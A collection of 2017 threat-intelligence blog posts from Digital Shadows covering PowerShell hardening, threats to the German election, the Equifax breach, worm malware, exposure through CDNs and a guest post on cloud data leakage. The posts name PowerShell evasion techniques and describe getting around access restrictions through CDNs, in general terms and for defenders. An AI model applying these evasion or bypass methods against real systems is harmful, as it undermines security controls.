    • Role Capability files. These files are used to specify what actions users in a particular role can perform. For example it can be restricted to use certain pre-selected cmdlets, functions and external programs making the use of custom potentially malicious cdmlets practically impossible. Examples of potentially dangerous commands that should be constrained, are ‘Start-Process’, ‘New-Service’, ‘Invokde-Item’ etc. Detailed information on how to create such files can be found here
    • JEA configuration samples. Examples and templates can be found in Microsoft’s JEA Github repository (

    Finally, another significant benefit of JEA is the actionable logging and reporting which is available in the Windows event log format, since all operations performed through the JEA endpoint can be recorded (with transcripts and logs) and show who accessed the environment and when, and what changes were made.

    6. Scripts Code Signing

    If PowerShell scripts are used in an enterprise environment, code signing is another control that improves security posture, by ensuring authenticity and integrity. This feature, along with a defined Execution Policy or Group Policy as “AllSigned” or “RemoteSigned”, will permit only digitally signed scripts to run. However we have to consider that several attacks in the past used malicious files digitally signed so this control just adds another security layer since it can be bypassed.


    Because PowerShell is being monitored more and more by the day, adversaries have come up with techniques that evade detection, including:

    • Version downgrade to PowerShell v.2
    • Custom use of .NET Framework without PowerShell.exe execution
    • PowerShell obfuscation (invoke-obfuscation)

    These are just indicative techniques; further analysis is not within the scope of this document, however “Logging PowerShell Activity” best practices will detect most of them.


    The most significant recommendation, after reviewing most of the known attack techniques used recently, is upgrading to Windows 10 and PowerShell v.5 with all security features enabled and removing PowerShell v.2 as well. However, this is not easily feasible for most enterprise environments; of equal priority are activating embedded security features and extensive logging focused on specific indicators commonly used for attacking techniques.


    To learn more, subscribe to our threat intelligence emails here.

    Recognition of Hard Work and Relevance – It’s Time to Go Global Wed, 20 Sep 2017 02:43:25 +0000 The news this morning that Digital Shadows has received $26 million in Series C funding from a number of new investors is testament to the hard work the whole team has put into making Digital Shadows successful and relevant for today’s digital economy.

    Before and After Digital Shadows James and Al

     Figure 1: Now and then – a look back at an interview from our early days and our latest company video

    The fact that Octopus Ventures, World Innovation Lab, Industry Ventures and all of Digital Shadows’ existing investors are excited to invest in this business, which James Chappell and I started 6 years ago, shows that our drive to manage businesses’ digital risk is resonating with organizations of all sizes who continue to need support managing their online exposure, data loss and the increasingly targeted threats by professional cybercriminals and hacktivists.  I am proud that Digital Shadows is able to operate as an extension of our clients’ internal teams, working on these challenges side by side as partners.

    The more we digitize business and government, the more we risk damage to our brand reputation, loss of intellectual property and exposure of sensitive data either through error, by well-meaning insiders and third parties, or malicious threat actors.

    In this digital world we live in, Digital Shadows’ ability to monitor, manage, and remediate digital risk across the widest range of data sources within the open, deep, and dark web is gaining widespread acceptance and week by week we see more of the world best brands signing up to our service.

    This latest investment, which brings our total funding to almost $50million, will enable us to grow internationally, particularly in Asia Pacific and continue our investment in our market leading solution, SearchLight. All our new investors have impressive international pedigrees and complement our existing funders perfectly and we look forward to welcoming Luke Hakes from Octopus Ventures to our Board.

    Over the past six years Digital Shadows has grown and expanded from our original base in the heart of London, to the global stage with more than 140 employees in offices in London, San Francisco and Dallas.

    Digital Shadows Offices

    Figure 2: Images from our San Francisco, Dallas, and London offices 

    It’s a long way from the early days when James and I worked hard to bring our vision to life, and it is heartening to see our goal of enabling enterprises to protect and manage their digital assets and reduce their digital risk being embraced by investors, analysts and, of course, customers around the world. I want to personally thank every member of the Digital Shadows team and all of our clients for their efforts in making the company what it has become today. Here’s to the next six years and what they will bring!

    Bringing Down the Wahl: Three Threats to the German Federal Election Thu, 14 Sep 2017 02:28:14 +0000 Hacking has become the boogie man of political election discourse. In Kenya, the recent presidential election result was forcibly annulled after the opposition alleged voting systems had been hacked. While these claims may be entirely valid, what’s worrying is that no concrete or convincing evidence to prove these allegations has been made public so far. Although not a new phenomenon, ever since the United States presidential election in 2016 the spectre of election interference by hostile nation states, hacktivists or political opponents has embedded itself in the public consciousness, and the fear of vote tampering grows by the day.

    The German federal election takes place on 24 September. Germans vote with pen and paper, and votes are counted by hand, but researchers have allegedly discovered vulnerabilities in the software used to register voting tallies – though it is still unclear whether these tactics can realistically be used to manipulate the election results itself. Germany also has a long tradition of coalition governments. No party has won an outright majority since 1957, and two out of three of Merkel’s governments since 2005 have been Grand Coalitions with her main political opponent, the Social Democratic Party (SPD).  With the German system geared to avoid partisanship, it makes it extremely difficult for an external power to influence the election and get a particular candidate into office.

    Digital Shadows’ analysis of election activity over the past 12 months suggests that we should look beyond the ballot box to the many other ways attackers can leave their mark on the democratic process. While attacks on physical voting systems are rare, attackers often look to capitalise on weaknesses in the broader political apparatus by targeting individual politicians, party networks or local branch offices. Voters may also be targeted by influence campaigns achieved through the spread of false information online. In the upcoming German election, therefore, we should look out for:

    1. Network intrusions and data leakage.

    As seen in both the United States and French presidential elections, attackers will look to release potentially sensitive files in order to discredit a political candidate. Two days before the French election vote in May 2017, an anonymous user posted emails, document and photos intended to embarrass Emmanuel Macron to the 4Chan message board. The ”Macron Leaks” ended up being relatively ineffectual, though this and previous leaks by Guccifer 2.0 in the United States election highlight how data leaks are believed to be an effective tactic for influencing the political process.

    Documents used in data leaks are often obtained through an initial network compromise. In the case of Guccifer 2.0, the leaked files were allegedly attained through a breach of the Democratic National Congress’ servers. German officials fear that sensitive emails stolen from senior lawmakers and politicians by apparent Russian hackers in 2015 could be released to harm Angela Merkel’s campaign. The offices of at least 16 parliamentarians were reportedly compromised in 2015, and in Mar 2017 think tanks aligned to Merkel’s Christian Democratic Union (CDU) were also purportedly targeted by APT-28, an espionage group widely believed to be associated with the Russian intelligence services.

    While allegations of Russian interference are unconfirmed, the fear is that Russia has considerable interest at stake in the outcome of the German election and will conduct network compromises as a means of collecting valuable strategic information. Points of interest include the fraught relationship between Russia, NATO and the EU, as well as the future of the Russo-German economic and commercial relationship – particularly with regards to energy provision – in the wake of the United States Congress’ recent decision to pass increasing international sanctions against Russia due to alleged election interference.

    2. Disinformation campaigns.

    Also known as FAKENEWS, false information intended to mislead audiences can be distributed via a wide variety of different media, including spoof social media accounts and even established online publications. The concern is such that in April 2017 the German cabinet voted on measures that penalize networks that fail to remove defamatory false information, hate speech and other illegal content with a €50m fine.

    German commentators believe most of the disinformation targeting German citizens has focused on immigration policy, which aims to spread xenophobia and undermine Merkel’s previous welcoming of refugees. The German fact-checking website Hoaxmap, for example, was established to identify and refute untrue online claims about refugees:

    Threats to German Elections 2017 2 

    Map taken from Hoaxmap website showing reported instances of false media stories on refugees [Source: Hoaxmap[.]org]

    3. Attacks on local political organizations.

    Attacks against local party branches and regional German parliaments have been reported. The CDU claimed its headquarters in the state of Rhineland-Palatinate experienced “massive attacks” ahead of the presidential debate on 03 September. The parliament network in the state of Saxony-Anhalt was reportedly targeted by a ransomware infection in late August, while the website for the North Rhine-Westphalia state was the victim of a denial of service (DoS) attack by an extortion actor in July. Although the ransomware and DoS were both probably financially motivated and unrelated to the election, attackers may continue to target local party branches believing that their sites and networks are more susceptible to attack.

    Despite the rhetoric warning of Russian election interference, the supposition that Russia would automatically favor Merkel’s opponent is not so clear cut as it might have been in other recent elections. As mentioned above, Germany and Russia currently share a very strong trading relationship, despite political and diplomatic tensions between the two nations. Also, Merkel’s main opponent, Martin Schulz of the Social Democratic Party (SPD), will not necessarily be more amenable to Russian interests than the incumbent. Firstly, Schultz is a staunch European and was President of the European Parliament from 2012 to 2017. Moreover, Schulz has repeatedly publicly rebuked Russia for its foreign policy: in February, Schulz warned against lifting Russian sanctions over its role in the Ukraine crisis, while in October 2016 he criticized the major role Russia had played in the Syrian civil war.

    While the likely motivations and ambitions of hostile nation states remains unclear, organizations can help protect themselves against many of the techniques described above. Mitigation measures include:

    • Providing adequate phishing training for all staff to lessen the risk of network intrusions and public data leakage
    • Properly securing public facing applications
    • Enforcing strong password security practices to reduce the likelihood of account takeovers, particularly on official social media accounts that can be used to spread disinformation
    • Monitoring for fake or spoofed social media profiles, and typosquats designed to impersonate legitimate websites
    • Remain sceptical about reported stats and stories and attempt to verify them across multiple channels

    Influence campaigns, party network intrusions, and fears of vote hacking are now as central to the election process as traditional campaigning and party broadcasts. It is difficult to measure the impact of these types of attacks, but the mere possibility of election interference has served to further damage confidence in politics, particularly in the Western world. It would be naïve to assume that these fears would dissipate any time soon, especially as fears of election interference have a much longer history than the events of the past 12 months. Nevertheless, it is important that we learn to manage these ever-evolving risks and help maintain the elements of our political and electoral systems that we most cherish, while continuing to iron out their many imperfections.

    An Update on the Equifax Data Breach Wed, 13 Sep 2017 02:17:27 +0000

    The credit reporting agency Equifax reported on September 7th, that it had been breached. On Friday, we outlined what we knew at the time, which was replete with intelligence gaps. Five days have gone by and some of these gaps have now been filled in. Here’s what we know so far, and what we can learn from the Equifax breach.

    Equifax Timeline

    Figure 1 – Timeline of events surrounding Equifax breach


    Threat Actor Claims

    There have been at least two claims made by financially-motivated threat actors. One actor had made an extortion attempt and claimed to possess the data, the other offered web shell access to an Equifax server. The credibility of either of the claims was unknown and based on the available evidence the likelihood they were genuine could not be judged.

    1. Extortion attempt

    A Tor hidden service was established around September 8th on which claims were made the owners had compromised the Equifax data and were trying to monetize it. They valued the data at 600 Bitcoin (USD 2.7 million), alleging Equifax executives had amassed USD 3 million in shares by conducting insider trading prior to alerting the public to the breach incident. The operators of the hidden service set a deadline of September 15th for this ransom demand, claiming they would delete the data they possessed if it was paid. If no ransom was paid, the actors said the data would be released publicly. At the time of writing these claims were not confirmed, the site was no longer reachable and the email address had been disabled.

    Equifax Statement on Tor site

    Figure 2 – Statement on Tor hidden service

    On September 11th, an actor using using the same nickname – “pasthole” – claimed on Pastebin that a portion of the data was sold to an unidentified buyer. The actor also said they were responsible for the Tor hidden service previously used to announce an extortion attempt against Equifax. An email address and PGP key provided in the post provided no direct links between the now-offline Tor hidden service and the Pastebin post. None of the claims in this post could be substantiated at the time of writing.

    2. Web shell access offered for sale

    On September 8th, an actor known as “1×0123” claimed to have gained web shell access to an Equifax server, and subsequently offered this access for sale. In their initial post to their Twitter account, 1×0123 posted a screenshot of what appeared to be a listing of Equifax subdomains allegedly being accessed via the Equifax website. In a follow up post, 1×0123 then claimed to offer access to the web shell in exchange for 1 Bitcoin (BTC) and supplied a Jabber ID for contact. Based on 1×0123’s screenshot, it appeared as though they used the WSO web shell, which is a popular tool among certain hacking communities. We did not detect any evidence of authenticity for the alleged web shell access. The screenshot below shows the post made by the actor, who redacted the screenshot.

    Equifax 1x0123 claim

    Figure 3 – Claim made by 1×0123 

    Apache Struts Touted As The Web Application Vulnerability

    In its breach disclosure, Equifax originally stated a web application vulnerability had been exploited which resulted in the data breach. There have been allegations this vulnerability affected Apache Struts reported in the media. This was following publication of an equity research report by Robert W. Baird & Co., which claimed an Equifax representative had told them Apache Struts was exploited to access the compromised information. None of this information could be confirmed at the time of writing.

    Criticisms Leveled Towards Equifax’s Response

    1. Executives sold shares prior to disclosure

    Three Equifax Inc. senior executives were reported to have sold shares collectively worth almost USD 1.8 million shortly after the company discovered the security breach on July 29th. The timing of these sales has led some to question whether the individuals had dumped the shares as a result of the breach. Equifax, however, said the executives had not been informed of the breach incident prior to them selling the shares.

    2. Equifax data breach checker

    Equifax released a service designed to allow individuals to check whether they were implicated in the data breach, but following this there were multiple reports that it was returning incorrect results. A test conducted by the media outlet ZDNet used fake names and social security numbers that returned the result “may have been impacted”. Equifax acknowledged that some consumers who visited the website shortly after it was launched may not have received confirmation they were impacted. It was not known whether the breach checker functioned correctly at the time of writing.

    3. Legal updates

    Following complaints from consumer advocates in relation to Equifax’s terms of service, the company announced that using its TrustID monitoring service would not result in a user forfeiting their right to join a class action law suit against the company in relation to the breach incident.

    On September 8th, The Register also reported two class action lawsuits had been filed against the company, in Portland, Oregon and North Georgia US District Courts. The lawsuits saw Equifax accused of negligence and violations of the U.S. Fair Credit Reporting Act. The complaint filed in Oregon reportedly sought USD 70 billion in damages for residents of that state alone.


    1. At the time of writing, it was not known exactly how many individuals were impacted by this data breach
    2. Despite the claims made by two threat actors, the individual(s) responsible for this breach and their motivations were unknown
    3. Although Equifax stated a web application vulnerability was exploited, the exact vulnerability exploited is not known.


    The breach has had a demonstrably negative impact to Equifax, both in relation to its reputation and its finances. As of September 13th, Equifax stock (EFX) is down $31.16 per share ( since the announcement of the breach. Data breaches frequently increase the amount of scrutiny around a company’s security posture, but the reporting on managers selling their shares, lawsuits and the way Equifax responded to the breach all likely degraded its brand reputation.

    The impact of this data breach to individuals largely depends on the motivation of the actors that gained access to it. For financially motivated actors, the exposed information would almost certainly be of high value as part of fraudulent activity; payment card details can be used to make fraudulent purchases, while personally identifiable information (PII) can be used in identity theft. This kind of data is also frequently offered for sale or traded on criminal locations, showing another potential means of profit. The New York Post published an article on September 8th, which said payment card fraud had “unexpectedly” spiked in August 2017. The article cited the co-founder of a fraud prevention service called Forter, who assessed the spike was likely tied to the Equifax breach. The co-founder, Liron Damri, reportedly claimed a 15 percent increase in fraud attempts was detected in August 2017. At the time of writing, there was insufficient evidence to confirm a link between the Equifax breach and the increased fraud levels.

    While debate continues as to whether this was a “zero day” exploit targeting a previously unknown vulnerability or a lapse in patching which caused the breach, the exact nature of the exploit is largely a side-show. The attack lifecycle describes a number of different stages that an attacker needs to traverse in order to successfully achieve its goals:

    1. Initial Reconnaissance
    2. Initial Compromise
    3. Establish Foothold
    4. Escalate Privileges
    5. Internal Recon
    6. Move Laterally
    7. Maintain presence
    8. Complete Mission

    The successful exploitation of the Apache Struts server merely compromises one of the eight steps, in particular the third one: “Establish Foothold”.

    In order to effectively defend against attackers, an organization must have prevention and detection mechanisms operating at all stages of the attack lifecycle. It cannot be assumed that patching a particular web application framework against security vulnerabilities is sufficient.

    Assuming that attackers are able to penetrate the perimeter of an organization is the “assume breach” model and is an essential part of a mature organization’s approach. In brief, it states that a defender should assume that attackers have already breached their outer defenses and are moving within the organization’s internal network. This corresponds to steps four through eight of the attack lifecycle. A defender can effectively respond to such an intrusion by exercising the principle of least privilege to reduce potential privilege escalation vectors, limiting opportunities for an attack to move laterally within an organization and detecting abnormal behavior, hunt for the introduction of persistence mechanisms and monitor the network for suspiciously large transfers to unknown systems outside of the organization.

    Combining these techniques is called “defense in depth” and allows an organization to be robust against attackers wielding zero day exploits.

    Equifax Breach: The Impact For Enterprises and Consumers Fri, 08 Sep 2017 08:36:49 +0000 What we know about the Equifax breach

    On September 7th, credit reporting agency Equifax announced “a cybersecurity incident potentially impacting approximately 143 million U.S. consumers.” To put this in context, at this time, this incident is almost seven times larger than the Office of Personnel Management breach of 2015. Equifax discovered the unauthorized access on July 29th and determined that the intrusion began in mid-May. Equifax stated that “the information accessed primarily includes names, Social Security Numbers (SSNs), birth dates, addresses and, in some instances, driver’s license numbers. In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed.” In addition, the “limited personal information” for Canadian and United Kingdom citizens was all accessed. The initial attack vector was reported as a “web application vulnerability.”

    Equifax Breach 1

    Figure 1. Chairman and Chief Executive Officer, Richard F. Smith discusses the Equifax Breach

    What we don’t know about the Equifax breach

    Whenever doing any sort of analysis, it is important to state what we don’t know. Simply put there is a great deal we don’t know and most of the public will never know (despite what some talking heads might claim). As a former incident responder, I know that investigations aren’t completed in the time it takes to complete an episode of TV drama Scorpion. (Did you know that Scorpion is starting its fourth season?) Equifax stated that the investigation is “substantially complete,” but wisely added that “it remains ongoing and is expected to be completed in the coming weeks.”

    • We don’t actually know how many SSNs were compromised.
    • We don’t know if all 143 million individual’s SSNs were impacted.
    • We don’t know the threat actor responsible for this intrusion. Equifax claimed that “criminals exploited” a web application, but attribution is always a challenge. Structured Analytic Techniques, like the Analysis of Competing Hypothesis we did for WannaCry, can be useful for considering attribution.
    • Speaking of web applications, although we don’t know the specific vulnerability that was exploited, I’d bet 1,000 Gold Dragons it was SQL injection.

    What is most likely to happen next

    There are a wide range of possibilities depending on the goals of the threat actor responsible for the Equifax intrusion. By the way, did I mention that attribution is challenging? Attribution aside, one thing is certain though, regardless of the motivations of the attackers, this data is perfect for social engineering attacks.

    Tax Return Fraud

    SSNs are highly valuable for criminals looking to commit tax refund fraud. Fraudsters use SSNs to file a tax return claiming a fraudulent refund and it can be hard to find out if you’re a victim until it is too late. There is some good advice from the IRS about what to do should you suffer from this form of fraud. You can read more about tax fraud in a blog we wrote earlier this year.

    Opening fraudulent accounts

    There is no shortage of alternative finance companies, such as those who provide short term loans. Fraudsters can successful open accounts in another individual’s name, using a combination of SSNs, fraudulent gas statements and other personally identifiable information (PII). Individuals should be extra vigilant for any evidence of accounts being opened in their name.


    PII is valuable to payment card fraudsters, who require such information to bypass security controls such as “Verified by Visa”, which sometimes ask for digits of cardholders’ SSNs. There are plenty of high-quality cards that criminals use which do not require extra validation, but the lower-level carders must turn to SSNs to enrich lower-quality card dumps. It’s important to remember that SSNs and payment card fraud are inextricably linked.

    Figure 2: An example of a security control for online credit card payments

    Benefits Fraud and Medical care fraud

    Although less glamorous than tax return fraud and carding, benefit and medical care fraud is a real risk. As with tax return fraud, this is hard to detect when it happens, but individuals can be vigilant when checking their Explanation of Benefits statement and flag any unfamiliar activity to their insurance provider.

    Resale of data

    It’s important to note that the individuals responsible for the breach are unlikely to be the same criminals conducting the day-to-day fraud. In the case of the Experian breach, this stolen data soon made its way on the (now defunct) Hansa marketplace. As I’ve previously mentioned; there’s already a market for SSNs to enrich credit card information, so it’s likely that many actors could end up getting a piece of the pie.

    For lower level criminals, the expenses associated with criminal activities will get even lower. SSNs are already cheap; on one AVC (Automated Vending Cart) site (shown in Figure 3), there are over 3.4 million SSNs for sale at only $1. This includes full names, addresses, and – for a large number of accounts – dates of birth. In California alone, there were 334,000 SSNs for sale.

    With tens (and potentially hundreds) of millions more SSNs potentially entering the market, the opportunities for criminals to commit fraud will increase and the price will decrease even more.

     Equifax Breach 3

    Figure 3: A screenshot of an AVC selling Social Security Numbers

    So far, I’ve focused heavily on SSNs – but credit card information was also accessed. However, in the breach. While this number is hundreds of thousands (209,000), it is unlikely to have a significant impact on an already burgeoning black market for card credit information.

    Enablement of nation state campaigns

    Although Equifax claimed this intrusion was conducted by a criminal threat actor, it is possible that this was a nation state actor. (Quick reminder to re-read my note from above “attribution is always a challenge.”) In the event that a nation state actor is responsible for the intrusion, then like the OPM breach, we won’t see the data being monetized in the criminal underground. The stolen data will be leveraged to enable nation states’ campaigns against their intelligence targets.

    Enablement of hacktivist campaigns

    If we are going to consider nation state actors, we should also consider hacktivist threat actors and their activities around the stolen data.  If hacktivists were responsible (I think this is a pretty unlikely scenario, let’s call it #OPunlikely) you could expect to see them use the data to target organizations and individuals that run counter to their world views. Embarrassment and dox’ing, hacktivist go-tos, would come into play.

    What enterprises can learn from the Equifax breach

    1. Incident response takes time and eradication in particular takes time. Equifax said that the intrusion was discovered on July 29th and that they “acted immediately to stop the intrusion.” Equifax’s goal was to contain the adversary that first day, but that true eradication took much longer. It is important that you set expectations with your leadership into how long eradication could actually take.
    2. 3rd party risks raise their ugly head once again. Some aspects of this intrusion remind me of the September 2015 T-Mobile breach. In this intrusion, Experian was hosting T-Mobile data that an unauthorized party accessed and this resulted in the loss of 15 million individual’s records. Any organization with a business to business relationship with Equifax needs to find out the scope of any potential loss of their employee or customer data. This 3rd party exposure also highlights the need for 3rd party risk monitoring.
    3. Crisis communication is key. Effectively communicating during an intrusion is important, it won’t absolve you of your sins, but doing it wrong could make the situation far worse. Understanding when and what to communicate is also important. Equifax discovered the intrusion on July 29th and notified on September 7th. Some might ask why did it take so long for the notification, but I don’t think that a month is that long. The investigation needs to be far enough along so that you can confidently communicate the situation. A CEO that comes out 2 days after a breach and then minimizes what is a much more significant threat will be performing a mea culpa in little time.
    4. GDPR will change the breach notification game. Now let me really trip you up, how would this situation play out if it was after May 25, 2018 and Equifax lost European Union citizen’s data? General Data Protection Regulation changes everything with 72-hour breach notification windows. GDPR states, “This must be done within 72 hours of first having become aware of the breach.” When the fines do come into place, the timing of the communication will have a significant impact.

    What consumers can learn from the Equifax breach

    1. Consider taking advantage of Equifax’s offer. Although the irony is not lost to me, taking advantage of credit file monitoring and identity theft protection offers is important. Check out equifaxsecurity2017[.]com for more. If you don’t want to use Equifax for these services, I get it, look for at alternatives with someone like Transunion or Experian.
    2. Be vigilant about your payment card activity. Use email/SMS alerts to notify of account transactions ($100) over and under ($5) a specific amount. If an unauthorized transaction occurs you can be notified immediately, and can quickly take action. Be vigilant about your card activity and alert your bank about any suspicious activity.
    3. Address tax fraud with IRS Form 14039. If you find out you are a victim of tax return fraud, there are still things you can do. Victims can file and send a IRS Form 14039. Further details are available here.
    4. Check your Explanation of Benefits (EOB) statement. It might look like another piece of spam mail, but it is important to reconcile the EOB statements that your insurance sends you. This your best bet to monitor for medical card fraud. Make sure to report any unfamiliar activity as soon as you observe it.
    5. Assume breach. In the corporate cyber security world, we have learned to “assume breach”. Consumers should also operate under the impression that their confidential data has been compromised.

    Digital Shadows will continue to monitor this situation and provide updates as needed.

    Return of the Worm: A Red Hat Analysis Thu, 07 Sep 2017 01:17:46 +0000 A computer worm is a piece of malware that is designed to replicate itself in order to spread to other machines. While worms have existed since at least the 1980s, they’ve made a surprise comeback in 2017. Notable pieces of malware, including ransomware and banking trojans, have sought to incorporate “wormable” functionalities. Following the WCry attacks, Rick Holland wrote a blog titled “The Early 2000s Called, They Want Their Worms Back”. Could 2017 be seen as the return of the worm? By using the Red Hat structured analytic technique, it’s possible to take the perspective of an attacker and understand the potential evolution of this technique in the near future.

    Worms in 2017

    In early 2017, the SamSam ransomware added self-propagation techniques. The developers of SamSam likely determined that the added technique would increase potential profits for the operators of the ransomware. More recently, Emotet and TrickBot, two banking trojans added self-propagation to their functionality. Banking trojans target customers of online banking services in order to harvest their credentials and access accounts for subsequent fraudulent transfers. Both Emotet and TrickBot demonstrated a new capability that attempted to allow self-propagation through a network using two distinct techniques.

    1. Emotet relied on the brute-force cracking of credentials to spread internally among networked systems, using a list of passwords hard-coded into the malware. This was incorporated in the months after WCry and Petya, demonstrating how criminals track cyber trends and adjust their TTPs accordingly.
    2. The new TrickBot variant attempted to autonomously propagate among networked machines over the Server Message Block (SMB) service. There have been further indications that the exploit used in the TrickBot variant was ETERNALBLUE, an exploit for an SMB vulnerability (CVE-2017-0144). ETERNALBLUE was released by the Shadow Brokers in April 2017 and subsequently used in the WCry (WannaCry) attacks of May 2017.

    Over the past six months, there have been multiple instances of malware using network self-propagation techniques. As seen in Figure 1 below, the Backdoor.Nitol and Gh0st RAT trojans, WCry, and now, possibly, TrickBot have used ETERNALBLUE.

    Wormable Trojans Timeline September 2017 

    Figure 1 – Timeline of malware adding self-propagation

    Red Hat Analysis

    The incorporation of a “worming” capability enables malware to propagate among machines within a local area network, and potentially between networks. This could enable a single successful delivery via a spam email, for example, to infect multiple machines.

    A lack of technical knowledge is one reason why we have seen a lack of adoption in the past. TrickBot is a well-developed and successful banking trojan, indicating that its operators were likely relatively well resourced; however, the newly added self-propagation modules were reportedly relatively poorly written in comparison to its older modules, suggesting a realistic possibility that they may still be under development.

    In order to assess the question of why banking trojan developers would adopt self-propagation techniques, we have conducted a Red Hat analysis exercise. Red Hat analysis is a structured analytic technique that prompts an analyst to change his or her point of reference from that of an analyst observing or predicting an adversary or competitor’s behavior, to someone who must make decisions within an existing operational culture. The technique works best when you are trying to predict the behavior of a specific person or adversary. The Red Hat analysis quadrant in Figure 2 shows the potential advantages, benefits, costs, and risks associated with future development of self-propagating techniques for banking trojans.

     Red Hat Analysis Self Propagation

    Figure 2 – Red Hat analysis of developing self-propagation techniques for banking trojans

    The self propagation outlook

    Actors or groups that can implement these techniques without compromising operational security would likely gain more profit. Given this, it’s likely that the development of self-propagation capabilities will continue in the near future.

    While there’s still limited information on how self-propagation techniques have increased the profitability of Emotet and TrickBot, the incorporation of these capabilities in multiple malware variants showed their developers and operators perceived the techniques as profitable. If development of self-propagation techniques continues, it will likely increase the extent to which a specific variant can impact an enterprise network. However, this would largely depend on how hardened a network is against such activity.

    Shortly after the WCry ransomware worm, we wrote a blog on 5 lessons we can learn from security engineering. The advice in this blog extends beyond the WCry incident, and provides good advice for protecting against the rise of wormable malware, covering these five areas:

      1. Default deny
      2. Least privilege
      3. (Attack) surface reduction
      4. Need to know/compartmentalization
      5. Defense in depth
    Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might be Affected and What You Can Do About It Wed, 06 Sep 2017 16:55:39 +0000 CDN Header Image

    Whether it was the Mirai botnet and Dyn or the “Cloudbleed” revelations, content delivery networks (CDNs) have been in the news recently. Research by Swisscom and Digital Shadows found over 100 million web pages and files exposed on CDNs, with many sensitive pdf, ppt and xls files publicly available online. The risks don’t stop here; if improperly configured, CDNs can be used to bypass age restrictions and registration requirements.

    What is a CDN?

    To start off, let’s level set on what a CDN does. A CDN is a system of distributed servers that deliver webpages and other web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server. This means that users can access content a lot quicker, as well as making them less susceptible to denial of service attacks. Given that over 52% of the Alexa 1,000 websites use a CDN, you might not realize how often you are browsing CDN delivered content.

     CDN Figure 1

    Figure 1: Diagram of a CDN. Source:

    Research Methodology

    To assess the amount of content exposed by CDNs and the subsequent risk:

    1. We first enumerated as many Content Delivery Networks as possible and identified the most deployed CDNs. In total we identified 293 CDNs, many of which can be found here
    2. Searches for these domains were completed across Google, Yandex and Bing to identify the search engine with most coverage. Google was found to have the highest yield, having the most results in over 50 percent of the CDN providers.
    3. Other searches were performed to assess the number of file types and the sensitivity of these documents.
    4. Finally, more manual analysis was applied to understand the implications of the content of these documents.

    Over 100 Million Indexed Pages Leave Organizations Exposed

    In total, searches indicated that there were 103,944,919 indexed web pages and web content across the CDN domains we assessed. Of these, nearly 15 million CDN delivered web pages had pdfs on them. Many of these were benign, but over 22,000 were sensitively marked and not for public distribution.

    Some of the findings were enlightening. There was no shortage of intellectual property across pdfs and ppts, with designs, financial information, plans and pricing models and even reports about nuclear generating stations (Figure 2) all readily available.

     CDN Figure 2

    Figure 2: Nuclear Generating Station

    This could produce a gold mine for competitive intelligence, espionage and phishing. No hacking is necessary – the content is already out there.

    The publicly available spreadsheets (xls and csv files) were worrisome as well. Examples of the types of data discovered included:

    • Sensitively marked patient health testing data
    • A mobile app development competition database with exposed visa numbers, dates of birth, gender and occupation
    • Membership details of clubs with names, home addresses, emails and telephone numbers (See Figure 3)

    CDN Figure 3

    Figure 3: Spreadsheet

    CDNs can be used to bypass of protection mechanisms

    Security mechanisms are put in place so that a website’s content is protected. However, in some instances, CDNs can be used to bypass these restrictions.

    Take YouTube’s age restrictions, for example. Navigating directly to the video itself will force users to log in and verify their age (Figure 4). By searching for the video through a CDN, users can bypass this control on age restriction.

    CDN Figure 4 

    Figure 4: Age restriction on

    CDN Figure 5

    Figure 5: Bypassing YouTube’s age restriction via a CDN

    Secondly, we identified ways to bypass registration requirements for content. An online education platform that charges between $99 and $995 a year. For this fee, users can access a wide range of course materials. Unless they choose to access these resources through the website’s CDN, which would cost the users.

    Why it matters

    It is no surprise that there is sensitive information available through search engines; there are many instances of data exposed through an organization’s supply chain. As demonstrated by the previous examples, the impact of these external digital risks include:

    • Loss of revenue
    • Reputation damage
    • Compliance issues

    Adversaries can reap the rewards of these CDN issues by directing and tailoring their searches to these domains.

    What can be done

    Let us be clear – most files and pages available through CDNs are perfectly benign. However, a subset of this can leave organizations exposed. Considering the upcoming EU GDPR regulations, it is important that organizations understand where their data exists online. The fact that CDNs duplicate this information can pose a risk for organizations. In various cases that we identified it was actually the CDN which is exposing the data without the organization’s consent. There are several things organizations can do to secure their data, identify and mitigate the risks associated with the digital shadows found on CDNs:

    1. Use URL signing and appropriate TTLs on URLs that you share. URL signing allows you to protect your files from unauthorized access with a key. Cdn777 provides good advice
    2. Have a defined document marking system, whether that is through Digital Rights Managements (DRM) are a defined template system in MS Office. This will allow you to more readily identify which documents should or should not be available online;
    3. Ensure that your sensitive information is not being indexed by search engines. Most CDNs will offer guides on how to unindex pages. Hubspot, for example, provides good advice on how to use noIndex and nofollow HTML metatags.
    4. Setup Google Alerts to monitor for the risks associated with CDNs. Understand that it isn’t always you that will be exposed these documents; often it is third parties.
    Bitglass: Compromised Credentials are Just One Way Your Corporate Data is Being Exposed Fri, 18 Aug 2017 19:19:25 +0000 A guest blog from Bitglass, read the original at 

    Every day, employees around the world use the cloud to perform their jobs. With bring your own device (BYOD), workers are given dynamic data access to complete their work from unmanaged devices, remote locations, and unsafe WiFi. Due to the host of modern cloud applications, corporate information can be stored in more places and shared more widely than ever. Together, these trends of BYOD, remote data access, and widespread sharing put enterprise data in jeopardy.

    In its recent study, “Datawatch,” Bitglass explored the ways in which sensitive information can be put at risk by careless employee behavior, and conducted experiments to gain insight into how easily corporate data can leak.

    Unsecured Public WiFi

    Many individuals see free public WiFi as a helpful avenue for internet access and completing work. However, such networks are typically unsecured and can allow mischievous parties to steal login credentials and other sensitive information. To uncover how easily this kind of theft can occur, Bitglass provided free public WiFi at random Bay Area locations to determine how many people would connect and what domains they would visit once online.

    Sharing and Malware

    The degree to which files are shared across cloud applications can expose corporate data. Organizations can be put at risk by malicious and unauthorized users accessing sensitive information. Additionally, if even one employee is infected by malware or ransomware, she or he can spread it throughout the company merely by uploading an infected document to a shared cloud app. To test this, Bitglass, analyzed how widely its customers share their data across multiple cloud applications.

    Compromised Credentials

    In light of the above scenarios, it’s apparent that one set of compromised credentials can lead to excessive data exposure. In its Compromised Credentials report, Digital Shadows, a company that gives deep analytics on digital risk, provides insight and surprising statistics on compromised credentials and the dark web.

    Geography of Leaked Credentials

    To learn more about data exposure and the results of Bitglass’ experiments, download the full report.

